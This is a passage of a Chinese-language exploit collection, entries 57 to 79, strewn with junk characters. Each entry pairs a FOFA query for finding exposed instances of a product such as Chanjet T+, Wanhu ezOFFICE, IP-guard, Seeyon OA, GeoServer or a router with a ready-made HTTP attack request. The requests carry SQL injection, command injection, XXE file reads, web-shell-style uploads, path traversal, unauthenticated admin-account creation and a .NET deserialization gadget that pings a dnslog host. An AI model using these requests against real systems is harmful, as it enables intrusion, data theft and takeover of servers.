$ b4 V( @* m, f; a "MethodName":"Start",
9 R" |7 ?6 O; }# ^( E- B( W7 a "ObjectInstance":{6 ]3 X1 T/ ^7 t
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",2 j# |& U& ]8 |' j y4 i
"StartInfo": {
0 v, G* W, K' f6 g3 r% u( S9 ^ "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
5 E0 n' o% Y. e; Y8 s. |+ k2 ~ "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"* k. ~0 \& \1 D; H( W
}9 _6 n. l6 J6 P3 ~( q; V! H
}
$ n9 v! U1 g. M }- s: a0 W/ |9 L7 m! m u/ ^
}5 l* W7 ]( _3 I8 W4 R; q$ ]
; q: w' e/ A. N) X: \% A
: w: G* v! G5 u3 W: e+ |
57. 畅捷通T+ keyEdit.aspx SQL注入
5 S1 d9 B" m; u; U* M8 y" z8 fFOFA:app="畅捷通-TPlus"
6 L( W; B; f( X7 vGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1; A% }: W) a5 R2 n. c
Host: host2 Z5 J: R' ~9 w5 h9 c# U
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
& `$ T" k# U, B3 @/ G/ |Accept-Charset: utf-8
; v8 s, q% U) Q+ \Accept-Encoding: gzip, deflate
7 r2 J% Z1 u& L! e- DConnection: close
# W3 N" F6 G8 X$ i" n0 T) R, S- {& d% ~4 d, r% I- B3 {7 y& m1 w
2 W8 [5 w8 K4 e# Y( q58. 畅捷通T+ KeyInfoList.aspx sql注入0 ]5 M; L; D \& u3 b- R, [- t1 n" Z
FOFA:app="畅捷通-TPlus"& h1 ^) u( q; q6 p7 O( J/ m3 d/ \
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.18 j9 M8 s* }% q
Host: your-ip4 r2 u4 x5 D4 C$ Q% z
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36. W p3 s/ B: ?8 _1 w5 l
Accept-Charset: utf-8
4 S- \" R9 Q) [Accept-Encoding: gzip, deflate
4 [" b! w# w# VConnection: close
# k+ L( u8 k5 [0 r9 \+ p+ I& q& l5 y: G+ _
" H! _6 c; N3 }3 R! b" x: b# e59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行* o+ m8 ? R. @% p) f5 Q
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd": A9 |! m5 }7 u. q, e# l
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1/ n1 H! ^4 e/ M4 I# s E
Host: 192.168.86.128:9090# p6 m. m1 m& `+ R. V! |0 e) t3 }
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
5 f7 O; o9 t8 W1 E/ bConnection: close
( F0 ] \: ^* v/ Y( uContent-Length: 1669$ v0 G. W4 y: u5 F/ o2 P! K. M0 S
Accept: */*
/ E# W4 j( B; S' W' _8 D# s6 XAccept-Language: en0 {: a1 u0 p9 ?7 r% Y& ] s. z
Content-Type: application/x-www-form-urlencoded
7 O9 F, {- Y! r& VAccept-Encoding: gzip0 G0 C) W) [7 u4 O
' |8 F7 {2 [4 ~9 p" R I! TPAYLOAD
# Y6 x! @9 ?' j/ h8 }* E' C+ k0 x0 r& m) r0 r, c* u
9 O& d: N8 D- f. a1 k( ?60. 百卓Smart管理平台 importexport.php SQL注入
! n3 o7 w% ]+ q' ^/ f) K$ c EFOFA:title="Smart管理平台"
5 m& d2 x. b6 `7 j* l- xGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
4 p& ?( }# g3 fHost:
" E! |% A% w* s8 v9 y3 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
3 b r0 g* ~& BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 B# E4 F9 m/ C5 X7 _9 d
Accept-Encoding: gzip, deflate' d" F2 i# j7 }. x
Accept-Language: zh-CN,zh;q=0.9
b0 k, D* _" W$ hConnection: close
" H9 A" q$ h" ?) C$ ~
/ l( @4 ]4 z$ b' H4 r, x* q7 }& _3 o$ Q( _' g1 J
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传' u( A1 {4 ]7 g7 B0 \. k% W
FOFA: title="欢迎使用浙大恩特客户资源管理系统". ?$ _# w6 U* a7 L
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1/ u4 ] |/ M: P) x3 C, O- T
Host: x.x.x.x
% V7 B4 n, {% f' k$ p% SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 I9 o: W$ F- i- p& u% UConnection: close, q5 w2 R: p/ H- `1 J
Content-Length: 276 S }. G; b& {! ^8 @% x1 r
Accept: */*( p; R+ @$ I4 m
Accept-Encoding: gzip, deflate! U" `# t6 x' z$ Q" q4 `
Accept-Language: en4 m# r# E5 T0 w8 H$ t
Content-Type: application/x-www-form-urlencoded5 K. u" Y, S$ P+ f0 w, f
s$ g3 X' x, A# D3 _. a8uxssX66eqrqtKObcVa0kid98xa% n* a9 ~1 _' L
( T- u$ y6 w( h8 h$ P$ U" q; v" U
0 b. U7 |2 t) E1 K( i1 k U+ l62. IP-guard WebServer 远程命令执行) m3 o, s, ^+ G/ I$ X
FOFA:"IP-guard" && icon_hash="2030860561"
# b- t# G3 `) u* U* P4 d1 b' R+ I2 dGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1' D& Z0 G8 O1 G3 {$ d9 G
Host: x.x.x.x3 B# ~$ I7 J2 \1 s
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
: G8 l- m4 I# v, b- b+ @Connection: close% B2 J1 _$ J: ], d+ P
Accept: */*+ u, D, ~6 Y: ]) k( ?
Accept-Language: en6 O8 z( Q& v) |) p" N' B& I
Accept-Encoding: gzip
w* f( e0 a* ?9 j2 Z0 l# f8 r3 }& e7 N
+ Y" U; S( M0 t V2 j- l7 f! P访问5 \# D( t9 {, g" Q, P3 ]! ^
1 E( C# H# A5 b) m; ]GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
1 G" J5 j3 _ c, j8 L2 hHost: x.x.x.x* p9 f0 X; ?8 Q. ?# _
# s) `- ~! K6 }& T. B8 V! Z8 C
4 u: i) m( x0 H63. IP-guard WebServer任意文件读取7 T/ p+ _" z- H0 @
IP-guard < 4.82.0609.09 u- T) x' q3 S1 C
FOFA:icon_hash="2030860561"' E( X. X0 D3 O8 o
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
3 |; N* f3 c3 R" |6 ^5 X$ ?7 yHost: your-ip* h# k0 c7 h# i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
7 v0 D3 |, s" HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 S3 ?7 I* H7 w5 K- U, h6 |1 Z+ f9 J
Accept-Encoding: gzip, deflate8 L9 k* ]0 n, b- |1 m+ n
Accept-Language: zh-CN,zh;q=0.95 `% a- |+ {% ]$ f% W: [9 U% y# S
Connection: close6 t$ i7 L" A* B' c
Content-Type: application/x-www-form-urlencoded% B" N, T" q A8 u4 b2 t1 O: I
/ \; e; _; I# A" i% o* ^
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A( e0 t [$ {# ?. A, }- f) ]( l
' g9 ?' s, B7 N, P
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
: r$ t0 T% S% \6 o DFOFA:body="/Scripts/EnjoyMsg.js"
( |' L2 ]) ~6 @8 V7 @- e/ VPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1* ?4 _( F& {3 |6 H( X I) k
Host: 192.168.86.128:9001
# C O i$ F) G: X1 MUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36% R! b, \7 R& H
Connection: close
4 ^- M* v6 e4 P/ y" l1 u9 jContent-Length: 369
6 t4 w* }1 e; ~Accept: */*
5 N: n$ d* u0 d7 P+ i& OAccept-Language: en; q& q5 t4 ?) P2 d$ G
Content-Type: text/xml; charset=utf-8
: K# N5 C4 k2 E, T, @Accept-Encoding: gzip
$ |* s0 Q: ~5 z3 T( m( o* a
7 |8 Z9 r0 [8 ] R$ s<?xml version="1.0" encoding="utf-8"?>
% l4 F7 J4 c2 x' }9 o0 ?( U<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">! r# }$ ]5 }; h& g: X
<soap:Body>" Y1 W/ ~. L3 c# s% t" {4 k
<GetOSpById xmlns="http://tempuri.org/">
* |* G1 ^5 |+ F+ f) a( c* T; { <sId>1';waitfor delay '0:0:5'--+</sId>: ?+ F% A; j9 q, b
</GetOSpById>$ a# k$ U, l# }. C( p' p" ?
</soap:Body>+ E3 f. h# j! ?9 s' `
</soap:Envelope>2 b% F( u3 H& p3 W0 n* Y) G
( u4 f ]3 D' c* R3 y
4 |) b5 t+ l O% w4 i2 n; M4 X65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
, v! v ]4 f# b2 eFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
9 N1 L: F- \! r' v2 p响应200即成功创建账号test123456/1234564 G9 |2 @& y1 o. [3 S% L: i
POST /SystemMng.ashx HTTP/1.14 A+ A( T; q2 V% G- G9 I
Host:
1 e9 O r3 c( R# `& t+ MUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
3 A8 A% @3 Q- V5 g7 z2 ?& BAccept-Encoding: gzip, deflate
4 A4 I+ a! z. r' UAccept: */*
6 E* p n% O0 e! O" v7 O& y3 fConnection: close5 O( [8 A& N& [) t* S' |
Accept-Language: en% A+ {7 e% a7 E, U. I+ ~
Content-Length: 174
2 J7 G6 g* p8 ]
4 T& {* l: k7 c: D+ Z2 [operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators5 |% X. N2 K4 V
) F/ V3 {: D* H- N/ }8 U
- t; m' k+ z. k" D1 w' U* L3 {2 w/ Y' `66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入* e: M' J3 L8 d1 ^! A( m; v: Q, O
FOFA:app="万户ezOFFICE协同管理平台"
9 a; H- k" m8 v! A, k+ R7 W. |8 C& Y7 t
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.18 b% @1 {9 W! \# g
Host: x.x.x.x
: R* [$ `' u! z5 WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
& l! I3 B' s5 P! q% [8 Z* [Connection: close) g2 m$ f7 Z) F; [/ L7 d
Accept: */*( m; l% y: ?/ {
Accept-Language: en
. G3 n3 Z* N8 \1 ]Accept-Encoding: gzip! p5 o+ f/ {7 L- T% b- e
n, \- v. e: k
" K" o6 k; t* Q& W& a# a
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在+ i( c9 C K" v& ]' D# f5 F9 H* Q; _
4 P% ~" f( ~5 G& _, w67. 万户ezOFFICE wpsservlet任意文件上传
7 v8 k4 S- w- v% ~0 T8 `! z' }FOFA:app="万户网络-ezOFFICE"
# T$ \: P. P9 D( }) qnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
8 j+ C3 b5 d/ D5 p, J! e* ^POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
7 `* Y3 L2 y5 b# a( b! ]/ o. _6 fHost: x.x.x.x
7 y( U ]# A" T7 \$ L2 M/ QUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0% T9 r: d# u$ c' i
Content-Length: 173
4 \) o3 |5 t) E! Y2 N7 vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
. Y( n: O8 g; r i6 e% M7 l9 aAccept-Encoding: gzip, deflate
+ b4 G# A/ f H7 tAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
- A+ ^. t$ b5 z3 S# pConnection: close
- _: x( c. }: \7 o7 ?: eContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
. Q( n A6 x: c4 S7 u( WDNT: 13 H) z' Q- F) W+ x, U' @
Upgrade-Insecure-Requests: 1
2 v7 ]5 Y4 _0 e( B
. ]: v \5 P6 e--ufuadpxathqvxfqnuyuqaozvseiueerp
% ?+ ], F* u2 yContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp": u* a6 S c( A+ d! w
) z% N& R# o' E2 {! S' a+ Y<% out.print("sasdfghjkj");%>
, U& A3 C K3 S/ j& J--ufuadpxathqvxfqnuyuqaozvseiueerp--
6 l# Z& S$ t5 Y7 ?, _8 l& S$ d' J2 i( K+ _0 C
7 G8 C' v) i8 ~1 e' G+ C1 f @
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp$ h9 i- C7 A& e+ H) L8 S
3 E! x X# s0 l0 n) w: L' q) e
68. 万户ezOFFICE wf_printnum.jsp SQL注入
+ D+ U: F* ^$ @" K7 P" QFOFA:app="万户ezOFFICE协同管理平台": x1 W- ^4 F3 J* `- z* g
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.14 q9 [" {; K; t7 x6 r2 Z) ^7 `" m, A
Host: {{host}}' ~" a$ j7 h- a3 \9 m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.363 J% m0 G" r$ ]4 O" N
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
# t) w3 C' P/ ~$ c1 pAccept-Encoding: gzip, deflate( y1 ` }9 h+ F$ H& h1 e1 ]0 d
Accept-Language: zh-CN,zh;q=0.9
. f# J+ t" M2 T! N- R" i' m8 }Connection: close
1 g2 X; u7 t! l' g" s/ |4 C% @+ W2 |
/ t5 F+ r( i! z69. 万户 ezOFFICE contract_gd.jsp SQL注入
# A7 `1 T5 L, |0 |6 bFOFA:app="万户ezOFFICE协同管理平台"
0 d2 m g3 q; d. @* l/ \GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.17 U/ ~% |; [) C/ e7 _
Host: your-ip( ^; W. w) w& E! \
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
/ C$ m# S1 Z9 j( T: m3 }9 B% a8 V/ q9 RAccept-Encoding: gzip, deflate
a$ T) B. V9 i4 B1 n& pAccept: */*
H$ O0 O! {7 A4 m3 U: hConnection: keep-alive$ j# d/ h% r5 T2 n
2 X% w O; M; b5 x/ S) h4 a
0 A/ j% T7 C& E8 j6 E o( {" R
70. 万户ezEIP success 命令执行
" K( o* E6 J% C3 _: n" _+ FFOFA:app="万户网络-ezEIP"
( F& U4 g6 b; s9 d hPOST /member/success.aspx HTTP/1.1
8 Y- L9 R" U V5 V8 Z: w$ p, G6 dHost: {{Hostname}}5 C* w# I: d# b- u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.369 i$ l; O2 D. M
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=& L# B+ r) A, M+ Z" q
Content-Type: application/x-www-form-urlencoded* O3 i' c# O; E R* |! x
TYPE: C2 G f, ], n8 }: R" H* j9 g$ U% R' x
Content-Length: 16702
. n) f# E- g" N7 }2 m% Y4 [* T l/ n: r* k
__VIEWSTATE=PAYLOAD
+ ~9 P( Y% f) q# L' x, e0 v% a/ j- H ?1 w( t$ L0 v
4 R# J+ J2 i5 I71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
+ {% D/ W# z8 EFOFA:body="PM2项目管理系统BS版增强工具.zip": h6 I7 Q: E7 g, h- O
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.13 u% u3 u5 L0 v5 h6 a' x9 Y c/ k
Host: x.x.x.xx.x.x.x
6 z/ H6 @6 \: `2 E, u6 m2 MUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36% |) o! N! _) u. g2 F
Connection: close; {7 w1 p, C4 p7 J+ B( j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% Z$ D( t7 @+ x% k, z. [Accept-Encoding: gzip, deflate' e9 T; k8 W+ V7 ^5 ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& M, |2 p- r; u8 k3 P% jUpgrade-Insecure-Requests: 1( b# C! ?) R2 s. I/ M& o! E
6 J$ @; l9 L9 E$ t
7 N6 w) N# k* M5 c3 L* \ H) d72. 致远OA getAjaxDataServlet XXE
- x* e' ^: Q- Y) X+ |FOFA:app="致远互联-OA": _" C7 v* T( U9 C
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
6 M9 ^% \& w, X7 W! B; ?/ oHost: 192.168.40.131:8099! i8 y! n% p1 C1 W* x8 P. m7 u: [6 Y7 |
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
5 M5 ~ B- t0 lConnection: close
7 [. f- z, g! G0 kContent-Length: 583& U6 K1 b1 B* `2 p. |& `' j
Content-Type: application/x-www-form-urlencoded
) j8 q8 _: ]. M1 B: eAccept-Encoding: gzip! S4 W6 u3 O7 r( W: R
3 j7 Z t+ s8 kS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E2 a. ^8 v% U S9 `- Y' c0 m; h
( A' y( i7 y# m# Z4 r( e
: w' s. T# o) A: P/ J! B
73. GeoServer wms远程代码执行" Z1 x; s/ \7 c# Z, v# n& n! P x
FOFA:icon_hash=”97540678”" \* I4 w4 N! S7 K9 i
POST /geoserver/wms HTTP/1.1
6 ~1 S, v! `3 k @6 cHost:" W" Z: c& j, ^% e A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
: q! } a( ?% T3 Q; ?/ w* f# [$ b* [Content-Length: 1981% F$ M3 g1 a& i0 z: L4 y
Accept-Encoding: gzip, deflate
, u! ?, r' I* c: m6 y, A) gConnection: close# O: N2 }; h% g" ?) a1 N
Content-Type: application/xml ]+ d9 ~" a2 N4 n: ~$ f
SL-CE-SUID: 3% Z1 ?2 R% c( W3 c
* @8 h" f) R8 S4 K
PAYLOAD
% I* R9 Q3 I& ^/ p+ t) L8 A
( C: F, ?1 D: |8 M$ H; q7 Q5 L- m* B8 A: g
74. 致远M3-server 6_1sp1 反序列化RCE
t1 N b- q; z% Q$ r" Q. HFOFA:title="M3-Server"4 x$ @9 E' w% w' h0 e& i) N3 J" `
PAYLOAD
) O' v2 r7 p" ]" l) N( H. `9 C- j" k& v+ j+ r) a
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE6 V! G: f7 i4 z9 I( O+ n
FOFA:app="TELESQUARE-TLR-2005KSH"
+ ]- {5 @0 Q/ p: {( a8 |2 ~GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1+ u# ~6 Z- N# v+ u# X! Q
Host: x.x.x.x
; F* ^, Z* h& kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 u* [$ C2 p( f1 P1 lConnection: close* I4 v; L, d5 c
Accept: */*
% P+ E: {: ^ C6 V4 ^' b& Q- {& uAccept-Language: en
9 h/ I$ o4 K& u. M0 [* VAccept-Encoding: gzip! ?0 R' B; f4 g3 Z
4 I) z8 O2 c& \+ E( e
5 @* {. c& M6 O: `3 E% `GET /cgi-bin/test28256.txt HTTP/1.13 k2 n$ j' s) h$ Y! a/ L8 H2 j. S
Host: x.x.x.x
# m) s9 w" J/ a3 J5 k8 x1 S! K
d7 c5 d" E" N* v) [; y8 f: d. `/ ]$ A- O+ h
76. 新开普掌上校园服务管理平台service.action远程命令执行" L8 c$ e8 C3 h
FOFA:title="掌上校园服务管理平台"! ~* L- l6 z+ U; X# j4 y/ p- d; A
POST /service_transport/service.action HTTP/1.1
}5 P" p8 y8 j i5 x1 IHost: x.x.x.x- t \1 G0 p" B/ Z; [! z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0( I2 l A9 L: p' Z
Connection: close
" `% N o4 v0 c& aContent-Length: 211
' F+ m- V1 e8 u" Y- EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" k: N/ I, | q
Accept-Encoding: gzip, deflate
$ X% ?: a7 h( y, u9 _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
j; [1 e% ^4 p! d b2 i# aCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4" E% U; S8 {: Q0 U% N
Upgrade-Insecure-Requests: 1
- @ o6 j8 d% Y' E- Y$ M
' `7 |% Z a1 V! Z{
[! [0 ]6 d. o- }"command": "GetFZinfo",
L% D8 d! ^7 e: D2 a; K "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
. \2 u/ L, C) t ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}". @/ X3 d3 h) V, u; `7 E
}
# ?6 a& s$ V' M0 N* [8 Z: e6 g& |) Q( ^7 R: V& d$ d3 l) \0 T
* V; ^( s" \# a$ j- T
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1+ G! o% T ^# R* b& m
Host: x.x.x.x/ }+ v& ]4 r6 g
q u' _4 x8 v p; {9 g" P
$ ]/ A% Q3 V: ?: p2 a3 t
' o4 [/ D* G% v2 }) b7 h
77. F22服装管理软件系统UploadHandler.ashx任意文件上传" H& q! m! p# ]6 R( j
FOFA:body="F22WEB登陆"% z% V6 K/ [" G3 g Q7 G
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
: C* d' v' U' m7 u* sHost: x.x.x.x
, v1 Y& h- o/ dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36+ m- R& |7 ]! e, j/ o4 f3 J. A( A- v6 b
Connection: close
7 J S4 ]7 d/ ^$ `9 E3 a: Z3 _" ~; @Content-Length: 433) ?% ^0 ^$ r* H& R9 z( f
Accept: */*) b7 G9 l+ F6 O% g5 N
Accept-Encoding: gzip, deflate) ?$ U% d* C1 x
Accept-Language: zh-CN,zh;q=0.9
& W* S# O- {- F1 m) H1 @8 rContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix6 l" D- `) k& r
- n9 `; U5 P1 J/ N- E+ g- D3 ?
------------398jnjVTTlDVXHlE7yYnfwBoix% r. H) C' n* A) Z9 q
Content-Disposition: form-data; name="folder"
+ l" G' X. R4 r6 z I U5 x5 G3 p: v5 `+ w& M5 n
/upload/udplog
' K6 D0 J @% a+ J3 O! ]8 W6 ~; W------------398jnjVTTlDVXHlE7yYnfwBoix
2 P9 u7 }7 E) x0 a" m* WContent-Disposition: form-data; name="Filedata"; filename="1.aspx"
( I `3 J' G3 {( U& ZContent-Type: application/octet-stream
" o( X- o: \" z3 J* W
7 {' l7 N& K- c5 Zhello12345673 V5 k' r/ {4 }
------------398jnjVTTlDVXHlE7yYnfwBoix3 t7 z$ C# I: A; Z1 t- A
Content-Disposition: form-data; name="Upload"
S, a% Q; [9 ^! P+ a- a" L
4 a+ i d. R3 n7 w1 g7 ISubmit Query0 I3 P: H* W' t
------------398jnjVTTlDVXHlE7yYnfwBoix--
- E' s, T/ x. [1 D/ B! }( g' I, {9 a) Z; z" M' k8 D" ~0 r' A8 L( E. S9 A
5 T9 w0 r7 C: T! w' j
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传 E3 V$ ~' D8 B# ]! T j
FOFA:icon_hash="2001627082"- i! f# e6 {- o- s2 ~
POST /Platform/System/FileUpload.ashx HTTP/1.1# w3 j% Y4 L/ h h, H8 J m3 j
Host: x.x.x.x# s* h8 r( ?5 T- |; Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ H' L" M4 e- U" @3 a' e$ K6 p
Connection: close0 d0 D0 P8 S3 O0 L) Z
Content-Length: 336
, C" S' o3 Y) MAccept-Encoding: gzip1 g; ^, Q: d' Z* X
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
9 _: V, N( q. |9 u2 k' P7 n' f) \" V7 W) ]. t6 W
------YsOxWxSvj1KyZow1PTsh98fdu6l
1 N4 e9 c2 D# c; F/ ` a- vContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"% D( U2 E1 v8 j# N
Content-Type: image/png
5 a4 K# V) _( \4 k1 `" C
" g* g# Y! d6 c8 |. GYsOxWxSvj1KyZow1PTsh98fdu6l7 n4 M" e1 N3 r7 ?; ~7 o. Z
------YsOxWxSvj1KyZow1PTsh98fdu6l
% p3 }6 E5 Y2 lContent-Disposition: form-data; name="target"$ a* l8 J. V3 N+ O# {) D
/ b+ k& ^% F+ F
/Applications/SkillDevelopAndEHS/5 r: S& F4 o& K; Z r- p
------YsOxWxSvj1KyZow1PTsh98fdu6l--+ X: E! K5 n: R% h- g; N
) C S* Y; _9 O
/ ?( A9 |2 b, C: R0 z4 ` \9 AGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
: f3 g* M5 \( fHost: x.x.x.x- v- Y0 Z. G" U. o! P
0 u1 w, z% A( {! Q2 L
6 E8 m- g. }+ S" d
79. BYTEVALUE 百为流控路由器远程命令执行$ W0 H$ A) l" U; W9 G J4 q/ |
FOFA:BYTEVALUE 智能流控路由器
